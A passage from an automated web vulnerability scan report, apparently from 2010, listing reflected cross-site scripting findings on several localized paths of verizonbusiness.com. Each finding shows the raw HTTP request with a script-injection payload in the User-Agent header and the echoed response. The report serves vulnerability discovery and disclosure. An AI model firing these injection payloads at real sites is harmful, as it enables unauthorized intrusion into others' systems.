Set-Cookie: BERT=VRID%3d284395bf-ddc7-4701-b04e-127768b337cc|VTID%3d83e35922-2aff-41e5-b3d0-2c999be94de1|SX%3d1289956814|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 06:03:58 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 19:00:16 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html lang="es">

<head>
<script language="JavaScript" type="text/javascript">
var regC = /https?:\/\/.*?\/\
...[SNIP]...
bject.embedSWF("/homepage/vzb_homepage_2010_preloader.swf?SetLang=es", "flash2", "1000", "500", "6", "",flashvars,flashparams,{},function(e){
var ua="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)f97ff</script><script>alert(1)</script>18bb90f6273";
var q="<q>
...[SNIP]...

1.1171. http://www.verizonbusiness.com/fr/ [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /fr/

Issue detail

The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 965f8</script><script>alert(1)</script>ad6aee0e267 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /fr/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)965f8</script><script>alert(1)</script>ad6aee0e267
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Last-Modified: Wed, 17 Nov 2010 00:56:45 GMT
Server: Roxen/4.5.146-release3
ETag: "b63b5b5107eb1a6adcbd112636ca198c"
Content-Type: text/html; charset=UTF-8
Vary: User-Agent
Date: Wed, 17 Nov 2010 00:56:45 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: BERT=VRID%3d2cbc3180-3962-46ad-9332-a0ecb8a8e58d|VTID%3d537ed1c6-5bd6-41ed-8e99-e9705296915c|SX%3d1289956603|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 06:00:27 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 18:56:45 GMT
Content-Length: 54488

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html lang="fr">

<head>
<script language="JavaScript" type="text/javascript">
var regC = /https?:\/\/.*?\/\
...[SNIP]...
bject.embedSWF("/homepage/vzb_homepage_2010_preloader.swf?SetLang=fr", "flash2", "1000", "500", "6", "",flashvars,flashparams,{},function(e){
var ua="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)965f8</script><script>alert(1)</script>ad6aee0e267";
var q="<q>
...[SNIP]...

1.1172. http://www.verizonbusiness.com/jp/ [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /jp/

Issue detail

The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 47080</script><script>alert(1)</script>35576418f3 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jp/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)47080</script><script>alert(1)</script>35576418f3
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
ETag: "ba0c86042cd7a844b88ddf36b0447e6d"
Last-Modified: Wed, 17 Nov 2010 00:58:08 GMT
Content-Type: text/html; charset=UTF-8
Vary: User-Agent
Date: Wed, 17 Nov 2010 00:58:08 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: BERT=VRID%3d7a2e46f6-70c5-409b-a12e-bc5a4644ca55|VTID%3d9d2b6e4a-9392-4561-be29-c6931818f6bb|SX%3d1289956687|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 06:01:51 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 18:58:08 GMT
Content-Length: 50562

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html lang="ja">

<head>
<script language="JavaScript" type="text/javascript">
var regC = /https?:\/\/.*?\/\
...[SNIP]...
bject.embedSWF("/homepage/vzb_homepage_2010_preloader.swf?SetLang=ja", "flash2", "1000", "500", "6", "",flashvars,flashparams,{},function(e){
var ua="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)47080</script><script>alert(1)</script>35576418f3";
var q="<q>
...[SNIP]...

1.1173. http://www.verizonbusiness.com/mx/ [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /mx/

Issue detail

The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 30181</script><script>alert(1)</script>ef5037903bb was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mx/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)30181</script><script>alert(1)</script>ef5037903bb
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
ETag: "a9ca4d51d2e037641c51fca6e07e34d7"
Last-Modified: Wed, 17 Nov 2010 00:58:27 GMT
Content-Type: text/html; charset=UTF-8
Vary: User-Agent
Date: Wed, 17 Nov 2010 00:58:27 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: BERT=VRID%3d2596e80a-9190-43ea-9a9d-18ef89faf0e3|VTID%3ddbafa122-747e-4a08-aa47-63f27558f13c|SX%3d1289956706|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 06:02:10 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 18:58:27 GMT
Content-Length: 53844

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html lang="es">

<head>
<script language="JavaScript" type="text/javascript">
var regC = /https?:\/\/.*?\/\
...[SNIP]...
bject.embedSWF("/homepage/vzb_homepage_2010_preloader.swf?SetLang=es", "flash2", "1000", "500", "6", "",flashvars,flashparams,{},function(e){
var ua="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)30181</script><script>alert(1)</script>ef5037903bb";
var q="<q>
...[SNIP]...

1.1174. http://www.verizonbusiness.com/pa/ [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /pa/

Issue detail

The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6b0de</script><script>alert(1)</script>361701e836 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /pa/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)6b0de</script><script>alert(1)</script>361701e836
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
ETag: "20dd1b545f384d5d8bb9e4410273ebfc"
Last-Modified: Wed, 17 Nov 2010 00:58:39 GMT
Content-Type: text/html; charset=UTF-8
Vary: User-Agent
Date: Wed, 17 Nov 2010 00:58:39 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: BERT=VRID%3d7df98491-7653-4215-8e58-1a6e20fbc3c1|VTID%3dd5898676-8185-478c-a931-916c7f891d6d|SX%3d1289956718|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 06:02:22 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 18:58:39 GMT
Content-Length: 53841

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html lang="es">

<head>
<script type="text/javascript" language="JavaScript">
var regC = /https?:\/\/.*?\/\
...[SNIP]...
bject.embedSWF("/homepage/vzb_homepage_2010_preloader.swf?SetLang=es", "flash2", "1000", "500", "6", "",flashvars,flashparams,{},function(e){
var ua="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)6b0de</script><script>alert(1)</script>361701e836";
var q="<q>
...[SNIP]...

1.1175. http://www.verizonbusiness.com/ve/ [User-Agent HTTP header]  previous

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /ve/

Issue detail

The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload de606</script><script>alert(1)</script>8db5382a073 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ve/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)de606</script><script>alert(1)</script>8db5382a073
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
ETag: "ffe44cfb6acd89c877b119a0daafdf9e"
Last-Modified: Wed, 17 Nov 2010 01:00:48 GMT
Content-Type: text/html; charset=UTF-8
Vary: User-Agent
Date: Wed, 17 Nov 2010 01:00:49 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: BERT=VRID%3d5734874e-54f3-472a-9fbb-e5f0ab044cf0|VTID%3d65d5aac0-bc1d-4975-8207-80ed788eb255|SX%3d1289956847|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 06:04:31 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 19:00:48 GMT
Content-Length: 53857

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html lang="es">

<head>
<script language="JavaScript" type="text/javascript">
var regC = /https?:\/\/.*?\/\
...[SNIP]...
bject.embedSWF("/homepage/vzb_homepage_2010_preloader.swf?SetLang=es", "flash2", "1000", "500", "6", "",flashvars,flashparams,{},function(e){
var ua="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)de606</script><script>alert(1)</script>8db5382a073";
var q="<q>
...[SNIP]...

Report generated by Hoyt LLC at Tue Nov 16 19:08:13 CST 2010.